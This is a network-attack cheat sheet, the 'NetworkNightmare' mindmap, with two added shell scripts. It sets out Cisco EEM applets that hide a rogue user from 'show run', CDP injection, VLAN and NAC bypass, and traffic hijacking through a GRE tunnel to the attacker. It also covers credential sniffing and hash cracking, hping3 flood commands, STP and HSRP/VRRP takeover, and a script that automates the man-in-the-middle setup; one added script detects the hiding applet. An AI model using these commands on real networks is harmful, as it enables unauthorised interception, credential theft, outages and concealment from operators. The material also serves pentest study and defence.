NetworkNightmare by Caster
Mindmap by Caster (https://github.com/c4s73r)
Hiding on Cisco IOS (EEM applet that filters "show run"):
  Owned(config-applet)#event cli pattern "show run" sync yes
  Owned(config-applet)#action 1.0 cli command "show run | exclude hidden | event | action"   (for hiding the user)
  It is recommended to write applets for other commands as well (show ssh, show users and other commands).
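A defender-side check for the applet above, added here as an example and not part of Caster's mindmap: the applet is absent from the filtered "show run" output, but it is still present in any copy of the configuration obtained outside that hook (startup-config, an archived or TFTP copy, or the output of "show event manager policy registered"). The script parses such a copy with awk, lists every EEM applet registered on an "event cli pattern" with "sync yes" (the ones that can intercept and rewrite an operator's command), and reports which of your own commands would be caught. The configuration text is constructed for the example; the host name, user names, applet names and the 192.0.2.10 TFTP address are placeholders.

```shell
#!/bin/sh
# Added example, not from the NetworkNightmare mindmap.
# Detect Cisco IOS EEM applets that hook CLI commands synchronously, given a copy of
# the configuration taken outside the hooked CLI (startup-config, archive, TFTP copy).

# Constructed sample configuration: "Owned" is the hiding applet from the mindmap,
# "Backup" is a benign cron-driven applet that must not be flagged.
SAMPLE_CONFIG='hostname EdgeGW
!
username admin privilege 15 secret 5 <hash>
username hidden privilege 15 secret 5 <hash>
!
event manager applet Owned
 event cli pattern "show run" sync yes
 action 1.0 cli command "show run | exclude hidden | event | action"
!
event manager applet Backup
 event timer cron cron-entry "0 2 * * *"
 action 1.0 cli command "copy running-config tftp://192.0.2.10/EdgeGW.cfg"
!
line vty 0 4
 transport input ssh
!'

# eem_cli_hooks: read a config on stdin, print one tab-separated line per applet
# that registers an "event cli pattern": applet<TAB>pattern<TAB>sync|async<TAB>command
eem_cli_hooks() {
  awk '
    function quoted(s) { if (match(s, /"[^"]*"/)) return substr(s, RSTART + 1, RLENGTH - 2); return "" }
    /^event manager applet / { name = $4; pat = ""; mode = ""; next }
    name != "" && /^ event cli pattern / {
      pat = quoted($0)
      mode = ($0 ~ / sync yes/) ? "sync" : "async"
      next
    }
    name != "" && pat != "" && /^ action [0-9.]+ cli command / {
      printf "%s\t%s\t%s\t%s\n", name, pat, mode, quoted($0)
      next
    }
    /^!/ { name = ""; pat = ""; mode = "" }
  '
}

# hooked_by CMD: config on stdin; print the names of synchronous applets whose
# pattern (an IOS regex, matched here with awk regex semantics) matches CMD.
hooked_by() {
  eem_cli_hooks | awk -F'\t' -v cmd="$1" '$3 == "sync" && cmd ~ $2 { print $1 }'
}

# Demo when run directly:  sh eem_hooks.sh demo   (or pipe a real config into the functions)
if [ "${1:-}" = "demo" ]; then
  printf '%s\n' "$SAMPLE_CONFIG" | eem_cli_hooks
  for c in "show running-config" "show users" "show ssh"; do
    hits=$(printf '%s\n' "$SAMPLE_CONFIG" | hooked_by "$c")
    printf '%-22s -> %s\n' "$c" "${hits:-not hooked}"
  done
fi
```

Run it against the real device by feeding the out-of-band copy to the functions, for example `eem_cli_hooks < EdgeGW-startup.cfg`; any "sync" hit on a "show" pattern is something the operator's CLI can no longer be trusted to display.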
Information Gathering:
  CDP/LLDP/MNDP/EDP (discovery protocols; MNDP carries RouterOS IP addressing information)
  CDP Injection:
    sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap" (inject CDP frame every 60 sec)

NAC/802.1X Bypassing:
  SilentBridge with custom hardware: s0lst1c3/silentbridge
  Evil Twin
  Orange-Cyberdefense/fenrir-ocd
  scipag/nac_bypass

VLAN Bypassing:
  sudo dhclient -v ethX.<VLAN ID>
  Double Tagging (Scapy): ONE-WAY ATTACK!!! EXPERIMENTAL!!!

Traffic Interception with Cisco ERSPAN:
  CSR(config-mon-erspan-src)#destination
  CSR(config-mon-erspan-src-dst)#origin ip address <source ERSPAN device IP>

Traffic Hijacking (GRE tunnel to the attacker):
  Attacker Side:
    sudo ip link add name evilgre type gre local <Attacker IP> remote <Victim IP>
    sudo ip addr add 172.16.0.1/24 dev evilgre
  Cisco IOS:
    EdgeGW(config)#interface tunnel 1
  RouterOS:
    [admin@EdgeGW] > /tool sniffer

Credentials Sniffing:
  lgandx/PCredz
  DanMcInerney/net-creds
  Cisco IOS OSPF: save traffic to .pcap, then ettercap -Tqr dump.pcap and bruteforce with John
  TACACS+: sniff & capture the TACACS+ key with the Loki tool, then bruteforce the TACACS+ key with Loki
  Type 5 (MD5): hashcat (-m 500)
  Type 7: theevilbit/ciscot7

Configuration Exfiltration:
  Sab0tag3d/SIET

DoS:
  DHCP Exhaustion Attack: Yersinia, Scapy
  ICMP Smurf: Scapy
  VTP frame injection: Yersinia
  hping3 TCP SYN Flood:
    sudo hping3 -c <packet count> -d <bytes> -S -w <TCP window size> \
      -p <target TCP port> --flood --rand-source <target IP>
  hping3 UDP Flood:
    sudo hping3 --udp -p <target UDP port> -d <UDP DGRAM size> <target IP>
  ARP Cage Attack (arp_cage.py tool by s0i37):
    sudo python3 arp_cage.py ethX <target subnet> <target IP>
  EIGRPWN Toolkit by Caster:
    Fake EIGRP neighbors:
      sudo python3 helloflooding.py --interface ethX --asn X --subnet X.X.X.X/X
    Reset EIGRP neighborship:
      sudo python3 relationshipnightmare.py --interface ethX \
        --asn X --src <target EIGRP router IP>

MITM Attacks:
  Prologue (prepare the attacking host first):
    Enable Masquerading:
      sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE
    Promisc mode (for capturing incoming & outgoing traffic):
      sudo ip link set ethX promisc on
    NAT Helper:
      sudo modprobe nf_conntrack
      echo 1 | sudo tee /proc/sys/net/netfilter/nf_conntrack_helper
      (sudo echo "1" > /proc/sys/net/netfilter/nf_conntrack_helper does not work: the redirect is performed by the unprivileged shell, not by sudo. The nf_conntrack_helper sysctl was removed in Linux 6.0; on such kernels assign helpers per flow with the iptables CT target instead.)
    Disable ICMP Redirect on your host:
      sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
      sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
    Check the mangle table for rules that would alter intercepted traffic:
      sudo iptables -t mangle -L
    Check the subnets under attack (the larger the subnet, the more hosts are affected and the higher the DoS risk)
  STP Hijacking ("Grit" toolkit by Caster):
    sudo python3 stpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX
  FHRP Hijacking:
    HSRP (Loki / Yersinia / Scapy):
      Inject HSRP packet with MAX priority (255)
      If necessary, crack HSRP authentication with hsrp2john.py
      Remove current default route & create new default route through the previous ACTIVE router
      Enable MASQUERADE
    VRRP (Loki / Yersinia / Scapy):
      Inject VRRP packet with MAX priority (255)
      Remove current default route & create new default route through the previous MASTER router
      Enable MASQUERADE
  Dynamic IGP Routing (join the routing domain; there is an automatic exchange of route information):
    FRRouting OSPF, connect to routing domain:
      FRR(config)# ip forwarding
      FRR(config)# router ospf
      FRR(config)# network <Attacker IP/32> area <area ID>
    FRRouting EIGRP, connect to AS:
      FRR(config)# ip forwarding
      FRR(config)# router eigrp <AS Number>
      FRR(config)# network <Attacker IP/32>
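The Prologue steps and the FHRP route swap above, as an added example script that is not part of the mindmap. It wraps the host preparation in re-runnable functions (iptables -C before -A so repeated runs do not stack MASQUERADE rules), turns on IPv4 forwarding (the mindmap enables it on the FRR side as "ip forwarding"), writes the nf_conntrack_helper toggle through tee so the write happens as root, prints a hint on kernels where that sysctl no longer exists, and points the default route at the previous ACTIVE/MASTER router with "ip route replace", the atomic form of "remove current default route and create a new one". hosts_in_prefix and assess_target implement the "check the subnets under attack" note: they size the target prefix so you know how many hosts an ARP cage or gateway takeover will disrupt; the low/medium/high thresholds (254 and 1024 hosts) are this example's own choice. The interface name, the 192.0.2.0/24 prefix and the 192.0.2.1 router address are placeholders.

```shell
#!/bin/sh
# Added example, not from the NetworkNightmare mindmap: attacker-host preparation
# ("Prologue") and the post-takeover route swap for HSRP/VRRP hijacking, plus a
# pure helper that sizes the subnet under attack.

# hosts_in_prefix A.B.C.D/LEN: print the number of usable host addresses in the
# prefix (/31 and /32 count every address, RFC 3021); non-zero status on bad input.
hosts_in_prefix() {
  len=${1#*/}
  case $len in
    ''|*[!0-9]*) return 1 ;;      # no "/LEN" suffix, or not a number
  esac
  [ "$len" -le 32 ] || return 1
  if [ "$len" -ge 31 ]; then
    echo $(( 1 << (32 - len) ))
  else
    echo $(( (1 << (32 - len)) - 2 ))
  fi
}

# assess_target PREFIX: the bigger the subnet, the more hosts are disrupted by an
# ARP cage or gateway takeover. The thresholds are this example's assumption.
assess_target() {
  n=$(hosts_in_prefix "$1") || return 1
  if [ "$n" -gt 1024 ]; then risk=high
  elif [ "$n" -gt 254 ]; then risk=medium
  else risk=low
  fi
  echo "$1 hosts=$n risk=$risk"
}

# mitm_prologue IFACE: forwarding, masquerade, promisc, no ICMP redirects, NAT helper.
mitm_prologue() {
  ifc=$1
  sudo sysctl -w net.ipv4.ip_forward=1
  sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
  sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
  sudo ip link set "$ifc" promisc on
  # -C checks for the rule first so repeated runs do not append duplicates
  sudo iptables -t nat -C POSTROUTING -o "$ifc" -j MASQUERADE 2>/dev/null ||
    sudo iptables -t nat -A POSTROUTING -o "$ifc" -j MASQUERADE
  sudo modprobe nf_conntrack
  if [ -e /proc/sys/net/netfilter/nf_conntrack_helper ]; then
    # "sudo echo 1 > file" would redirect as the unprivileged user; tee writes as root
    echo 1 | sudo tee /proc/sys/net/netfilter/nf_conntrack_helper >/dev/null
  else
    echo "nf_conntrack_helper sysctl absent (removed in Linux 6.0); assign helpers per flow, e.g.:" >&2
    echo "  sudo iptables -t raw -A PREROUTING -p tcp --dport 21 -j CT --helper ftp" >&2
  fi
  sudo iptables -t mangle -L   # confirm nothing in mangle rewrites intercepted traffic
}

# fhrp_route_swap IFACE OLD_ACTIVE_IP: after injecting the priority-255 HSRP/VRRP
# packet, point the attacker's own default route at the previous ACTIVE/MASTER
# router so victim traffic is forwarded on (ip route replace = delete + add atomically).
fhrp_route_swap() {
  sudo ip route replace default via "$2" dev "$1"
  ip route show default
}

# Usage:  sh prologue.sh apply eth0 192.0.2.1 192.0.2.0/24
if [ "${1:-}" = "apply" ]; then
  assess_target "$4"
  mitm_prologue "$2"
  fhrp_route_swap "$2" "$3"
fi
```

Nothing privileged runs unless the script is invoked with "apply", so the sizing helpers can be used on their own before deciding whether a takeover on that prefix is acceptable.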